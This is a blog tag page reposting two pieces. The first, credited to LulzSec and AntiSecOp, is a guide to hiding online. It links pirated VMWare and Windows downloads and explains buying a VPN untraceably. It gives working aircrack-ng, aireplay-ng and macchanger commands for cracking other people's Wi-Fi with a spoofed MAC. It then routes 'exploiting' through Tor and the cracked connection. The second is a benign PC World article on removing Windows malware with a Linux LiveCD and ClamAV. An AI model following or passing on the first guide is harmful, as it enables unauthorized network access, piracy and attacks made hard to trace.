The Mis-Adventures in Technology of an Old Dog Learning New Tricks…

Posts tagged ‘Live CD’

Want to be a ghost on the internet?

This is an excellent tutorial for keeping your online anonymity, etc.  Thanks to LulzSec and AntiSecOp for the excellent information. This information is provide for educational purposes only. Utilize at your own risk! But most of all have fun! Enjoy!

Want to stay safe online?

By @AntiSecOp

Required files:VMWare Workstation:

http://www.demonoid.me/files/details/2787488/008172892720/

Windows 7 Ultimate: http://www.demonoid.me/files/details/2811393/003064834770/

BackTrack 5 R1 VMWare: http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R1-GNOME-VM-32.7zpfsense: http://files.chi.pfsense.org/mirror/downloads/pfSense-2.0.1-RELEASE-amd64.iso.gz

Ubuntu Live CD: http://www.ubuntu.com/start-download?distro=desktop&bits=32&release=latest

Required Hardware:

Virtualization supported CPU

4GB RAM

USB wifi adapter supporting packet injection:http://www.amazon.com/Alfa-802-11b-Wireless-Original-9dBi/dp/B001O9X9EU/ref=sr_1_2?ie=UTF8&qid=1328768355&sr=8-2

VPN Account without paper trail

  • Purchase prepaid visa card with cash
  • Purchase Bitcoins with Money Order
  • Donate Bitcoins to different account
  • Purchase VPN account with bitcoins

VPN ServicesoVPN.to

Step One

  • Enable Boot and Setup page BIOS password
  • Turn computer on, press key to enter Setup. Usually F1, F2, F11, Del, something similar. Then go to the Security tab

Step Two

  • Boot Ubuntu LiveCD to cleanly wipe hard drive
  • After booting LiveCD, open up terminal and type sudo “fdisk -l” to get a list of disks and partitions
  • Use the wipe command on each partition that is listed with the above commandie “sudo wipe /dev/sda1”
  • Repeat for each drive (sdb, sdc) and each partition (sda1, sda2)
  • Reboot

Step Three

  • Install Windows 7 Ultimate and shred free space
  • Boot from Windows disk and install
  • After clean install, install fileshredder http://www.fileshredder.org
  • Run fileshredder using “Secure Erasing Algorithm with 7 passes”Reboot
  • Enable BitLocker drive encryption. Safe key to USB stick
  • Reboot
  • Run Windows Update
  • Turn off Swap space (Control Panel > System and Security > Advanced > Performance > Disable Virtual Memory
  • Reboot

Step Four

Install VMWare

Step Five

  • BackTrack 5 R1 Virtual Machine to be used for cracking WiFi
  • Open VMWare and import the BackTrack 5 R1 VMWare image (link above)
  • Set VM to 256MB RAM
  • Create a Network Adapter (VMNet0)
  • Directly attach USB wifi adapter (VM > Removable Devices > Check Wireless Adapter)
  • Bridge eth0 to wlan0

Easy Mode method:

  • apt-get -y install network-manager
  • rm /etc/network/interfaces
  • reboot
  • Open Network Manager
  • eth0 IPv4 Settings > Method > Shared to other computers
  • Use aircrack-ng to crack surrounding AP’s
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger –mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
  • airodump-ng wlan0
  • Get SSID and channel for next step
  • airodump-ng -c (channel #) -w (file name) –bssid (bssid) wlan0
  • Let this sit until you have plenty of data points
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • Look for successful ACK
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • Also let this run for a while, look for 10k ACK’s aircrack-ng -b (bssid) (file name-01.cap)
  • Connect to SSID

Step Six

  • Pfsense install to use VPN
  • 8 GB of Hard Drive space
  • 256MB RAM
  • Two Network Adapters (VMnet0 and VMnet1)
  • After installing from the downloaded ISO, set WAN to VMnet0 and LAN to VMnet1. You should get a WAN dhcp IP from VM#1
  • Assign LAN IP and enable DHCP (192.168.1.1/24)

Step Seven

Step Eight

  • BackTrack 5 R1 VM for all cracking/penetration testing/everything
  • Import another BT5 vmware image
  • 512MB RAM
  • One Network Adapter (VMnet1)
  • Set default Gateway to match the IP of your previous VM (TorBox)
  • ALL data will now travel securely (BT5 > Tor Network > Over VPN > Internet using cracked wifi)
  • Download Tor Bundle from torproject.org
  • Use FireFox Portable bunlded with Tor Bundle (more secure)
  • All exploiting/penetration testing, cracking, etc is done on this VM

Step Nine

Encrypt All VM’s

Open settings for Each VM in VMWare

Under Options > Enable Encryption

Set secure password

Torchat: OfflineE-mail: antisec@tormail.net

Twitter: https://twitter.com/AntiSecOp

Fix a Windows Infection Using Linux

By Katherine Noyes
Mon, October 25, 2010

PC World — If you use Linux on your company’s desktop or server computers, you’re already familiar with many of the security advantages the open source operating system offers over its Windows and Mac rivals. What many people don’t realize, however, is that Linux can also be used to rescue a computer that has been crippled by malware.

Malware is a frequent occurrence in the Windows world, in particular, and it can be devastating. When a Windows virus strikes, not only can it become difficult or even impossible to continue using the affected machine, but it can be dangerous as well, since prolonged use can further the infection.

That’s where Linux can be a life-saver. Without ever having to install the free alternative, you can still use it temporarily on a PC to get rid of any infection. Here’s how.

1. Get a LiveCD or Live USB

LiveCDs and USBs are a wonderful thing in the Linux world because they let you boot a machine directly from the CD or USB stick without ever having to access the computer’s boot records. Not only are they a great way to take Linux for a test-drive, but they can also be put to work when Windows can’t.

By far the fastest way to get a LiveCD or USB is to download the .iso file of the Linux distribution you’d like to use and then burn it onto a CD or USB stick. Since Ubuntu is the most popular distribution out there, I’ll go withMaverick Meerkat–the latest version of the software–for this example.

Ubuntu can be downloaded from the project’s Website for use on a LiveCD or USB; download links for other distributions can be found listed onFrozenTechUNetbootin is another nice option if you want to go the USB route, which tends to run much faster.

Of course, to take either of these options you’ll have to have a working, Internet-connected computer. If you don’t, or if your Internet connection is slow, you may want to order a LiveCD or USB via snail mail. OSDisc andLinuxCD both offer a variety of options; pricing is about $2.

2. Boot into Linux

Once you’re equipped with a Linux LiveCD or USB, you’ll need to make sure the infected computer is turned off, and then turn it on again with the CD or USB installed. This will boot the computer into Linux, completely bypassing Windows and its infection. Again, nothing has been installed — you’re simply using Linux to get the machine running reliably again.

3. Get Antivirus Software

Next it’s time to get the Linux-based ammunition you’ll need to wipe out the malware: antivirus software. I’m going to use ClamAV, my favorite, via ClamTK, which provides a nice graphical front end.

From the main Ubuntu desktop, then, go to “Applications” and then “Ubuntu Software Center.” Choose “Edit” and then “Software Sources.” You’ll be presented with a box entitled, “Downloadable from the Internet,” and you should be sure all four boxes are checked before you click on “Close.”

Next, from the main Ubuntu Software Center page, click on the “Accessories” icon and type ClamTK into the search box. It will be shown as “Virus Scanner,” but if you click on “More Info” you can verify it’s the right package. Click “Install” and wait for it to download.

Once installation is finished, you should launch ClamTK by going to “Applications” in Ubuntu’s main menu, then “Accessories” and “Virus Scanner,” which is how the software will still be shown.

4. Run a Scan

When the ClamTK window opens, click on the “Scan” tab and select the option for a Recursive Scan. Next, you’ll need to tell the software which drive you want to check for viruses, which in this case is the one that includes Windows. Scanning may take some time, but once the infection is found you’ll get the usual options for what to do with it, including quarantine and removal.

5. Return to Normal

Assuming the infection has now been removed, your computer should be clean once again, making it safe to remove the LiveCD or USB and boot back into Windows as usual. As you enjoy your malware-free machine once again, remember that it’s all thanks to Linux. It’s also not a bad idea to keep your LiveCD or USB handy so you’ll be ready for the next time.

Follow Katherine Noyes on Twitter: @Noyesk.

© 2010 PC World Communications

 

By Katherine Noyes
Mon, October 25, 2010

Tag Cloud